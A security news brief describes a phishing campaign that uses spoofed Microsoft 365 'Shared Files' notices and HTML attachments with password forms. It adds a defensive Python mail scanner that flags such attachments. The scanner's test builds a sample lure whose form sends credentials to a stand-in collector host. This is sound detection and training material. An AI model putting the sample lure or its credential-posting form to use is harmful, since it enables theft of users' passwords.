Security researchers have uncovered a phishing campaign targeting energy and other infrastructure companies with HTML attachments that contain credential-stealing forms. In this campaign the threat actor makes the phishing email look like it came from an internal source by leveraging the “Shared-Files via” feature of Microsoft 365 and presents the attachment as a transcript being shared with the victim. The actual sender address, which uses a Japanese domain, is nevertheless clearly visible, and that mismatch between a familiar-looking notification and an unfamiliar sending domain is the tell worth teaching. After downloading and opening the HTML file, users are prompted to enter their Microsoft email password to access a fake invoice. This fairly minor campaign may seem trivial, but organizations are frequently compromised after an unwitting employee falls for exactly this kind of lure: one survey found that 83 percent of organizations that experienced a breach in 2021 attributed it to phishing. Security awareness training is therefore critical for every organization, because knowing that the threat exists is half the battle. To help employees know what to look for, consider the following resources in your security awareness reminders: 16 Social Engineering Attack Types and Nothing personal: Training employees to identify a spear phishing attack. Read more at Cofense, HelpNetSecurity, or ArcticWolf.
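To make the indicators above concrete, here is an added example (not code from the article, Cofense, HelpNetSecurity or ArcticWolf) of how a mail-filtering hook could flag the pattern described: an HTML attachment that carries a form with a password field, sent from a domain outside the organization's allow-list and hiding behind a "Shared Files" display name. The sample message, the sender and recipient addresses, the collector URL and the TRUSTED_SENDER_DOMAINS allow-list are all constructed for illustration; only the Python standard library is used.

```python
"""Flag messages whose HTML attachment carries a credential-harvesting form.

Added example for this article; not code from the article or the vendors it cites.
Every address, domain and URL below is constructed for illustration.
"""
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allow-list of domains that legitimately send "shared file" notices
# to this organization (its own tenant plus the Microsoft sharing domain).
TRUSTED_SENDER_DOMAINS = {"example-corp.com", "sharepointonline.com"}


class FormScanner(HTMLParser):
    """Record every <form> in a document and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>
        self._current = None   # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password_field": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def sender_domain(msg):
    """Domain of the real From address, ignoring the display name ("Shared Files")."""
    _, addr = parseaddr(str(msg.get("From", "")))
    return addr.rpartition("@")[2].lower()


def analyze_message(raw):
    """Parse a raw RFC 5322 message and return the indicators found."""
    msg = message_from_string(raw, policy=policy.default)
    result = {"sender_domain": sender_domain(msg), "flags": [], "form_action_hosts": []}
    if result["sender_domain"] not in TRUSTED_SENDER_DOMAINS:
        result["flags"].append("sender_domain_untrusted")
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())   # get_content decodes base64/quoted-printable
        for form in scanner.forms:
            if not form["password_field"]:
                continue
            if "html_attachment_password_form" not in result["flags"]:
                result["flags"].append("html_attachment_password_form")
            host = urlparse(form["action"]).hostname
            # An empty action usually means the page exfiltrates via JavaScript instead.
            result["form_action_hosts"].append(host or "(no action host)")
    return result


def is_suspicious(result):
    """A password form inside an HTML attachment is enough to quarantine on its own."""
    return "html_attachment_password_form" in result["flags"]


def build_sample_message(credential_form=True):
    """Construct a lure shaped like the one the article describes (all values made up)."""
    if credential_form:
        body_html = (
            "<html><body><p>Sign in to view the shared transcript</p>"
            "<form action='https://collector.invalid/submit' method='post'>"
            "<input type='email' name='user'><input type='password' name='pass'>"
            "<button>Open invoice</button></form></body></html>"
        )
    else:
        body_html = "<html><body><p>Meeting transcript: nothing to sign in to.</p></body></html>"
    msg = EmailMessage()
    msg["From"] = "Shared Files <sender@example.co.jp>"   # display name hides the domain
    msg["To"] = "employee@example-corp.com"
    msg["Subject"] = "Transcript shared with you"
    msg.set_content("A file has been shared with you. Open the attachment to view it.")
    msg.add_attachment(body_html, subtype="html", filename="transcript.html", cte="base64")
    return msg.as_string()


if __name__ == "__main__":
    for with_form in (True, False):
        report = analyze_message(build_sample_message(with_form))
        print("suspicious" if is_suspicious(report) else "clean", report)
```

The scanner deliberately keys on the password input rather than on the file name or the lure text, since those change from campaign to campaign while a credential form inside an attached HTML file has no legitimate business use. The sender-domain check is reported separately because it depends on a per-tenant allow-list and produces false positives for genuine external senders; the attachment check is the one that justifies quarantine.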
H2Oex: in-person, one-day event/exercise. Thursday, Dec 5th, Washington DC. Join us!